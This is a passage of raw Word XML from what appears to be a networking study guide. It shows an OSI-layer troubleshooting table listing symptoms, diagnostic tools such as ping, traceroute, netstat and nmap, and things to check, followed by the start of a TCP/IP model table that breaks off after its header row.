      </w:r>
    </w:p>
    <w:p w14:paraId="256F09E6" w14:textId="2BFC4583" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00B21970">
        <w:t>Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2162"/>
        <w:gridCol w:w="5172"/>
        <w:gridCol w:w="3867"/>
        <w:gridCol w:w="6295"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="45145871" w14:textId="77777777" w:rsidTr="00BE2661">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FDB92CC" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="159B7893" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Problem Symptoms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1105" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="086D586D" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tools to Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65E609D7" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>What to Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="7383652B" w14:textId="77777777" w:rsidTr="00BE2661">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3891D100" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D0BC0B2" w14:textId="3FC19C43" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Application won't connect</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Authentication issues</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Corrupt application data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1105" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56EC4262" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Application logs, curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40BB7BA6" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Credentials, app config, service status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="3181EE7F" w14:textId="77777777" w:rsidTr="00BE2661">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12CD28F8" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Presentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63A97FCB" w14:textId="0AA5C21D" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Encryption/decryption errors</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Unsupported file formats</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Character encoding issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1105" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78987672" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Browser dev tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C04DC3E" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>SSL certificates, file formats</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="1E714578" w14:textId="77777777" w:rsidTr="00BE2661">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60A74BE9" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D181851" w14:textId="5DF5C45E" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Sessions timing out</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Cannot establish DB connections</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Remote desktop disconnections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1105" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="706999C3" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Application logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E3CD2D7" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Session timeouts, service availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="52BFCE00" w14:textId="77777777" w:rsidTr="00BE2661">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A82CB61" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Transport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06C150B0" w14:textId="1F8B16B4" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Slow file transfers</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Connection timeouts</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Port blocking by firewalls</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t xml:space="preserve">• Packet loss </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1105" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41411A92" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>telnet, netstat, nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79A53A70" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Firewall rules, port status, service listening</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="6A9CED8B" w14:textId="77777777" w:rsidTr="00BE2661">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="234EC4D2" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FE17891" w14:textId="6D15C3DE" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Cannot reach remote networks</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• IP address conflicts</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Routing issues</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Gateway problems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1105" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27DB2912" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>ping, traceroute, ipconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DC35B94" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>IP config, routing, gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="2AD67DD9" w14:textId="77777777" w:rsidTr="00BE2661">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2151D0DA" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Data Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AC60F7D" w14:textId="7BDC6174" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Duplicate MAC addresses</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Switch port errors</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Cable problems</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Wireless auth issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1105" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B4D1582" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Switch management, arp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="573F1A08" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Switch ports, MAC conflicts, VLAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="4CC5190A" w14:textId="77777777" w:rsidTr="00BE2661">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01A6B89D" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Physical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74051D26" w14:textId="06398116" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• No link lights</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Cable faults</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Speed/duplex mismatch</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Signal interference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1105" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="033C2AE7" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Cable tester, link lights</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="364694BE" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Cables, connectors, port status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="175B06CC" w14:textId="58A66C2A" w:rsidR="00444340" w:rsidRPr="00444340" w:rsidRDefault="00444340" w:rsidP="00444340">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00444340">
        <w:t>TCP/IP Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADF0B2A" w14:textId="1F48E855" w:rsidR="00964C0E" w:rsidRDefault="00992F1A" w:rsidP="00964C0E">
      <w:r w:rsidRPr="00992F1A">
        <w:t>The TCP/IP model is the practical model used in real networks, especially the Internet. It's simpler than OSI but maps closely to how networks actually work.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="756"/>
        <w:gridCol w:w="2229"/>
        <w:gridCol w:w="5232"/>
        <w:gridCol w:w="5307"/>
        <w:gridCol w:w="3972"/>
      </w:tblGrid>
      <w:tr w:rsidR="00475AEF" w:rsidRPr="00B21970" w14:paraId="33A2C5BD" w14:textId="77777777" w:rsidTr="00475AEF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B6FC7D5" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A522E90" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DD131A3" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D6A2691" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Key Functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C562EF7" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Common Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475AEF" w:rsidRPr="00B21970" w14:paraId="12C1480D" w14:textId="77777777" w:rsidTr="00475AEF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0688BCAE" w14:textId="580E7F4C" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
